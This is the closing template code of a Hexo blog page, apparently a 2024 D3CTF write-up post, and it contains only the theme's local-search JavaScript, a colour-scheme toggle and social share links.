  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + 2024-D3CTF-WP%20and%20Review + '&url=' + http%3A%2F%2Fexample.com%2F2024%2F05%2F02%2FWriteUp%2F2024-D3CTF-Review%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2024/05/02/WriteUp/2024-D3CTF-Review/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
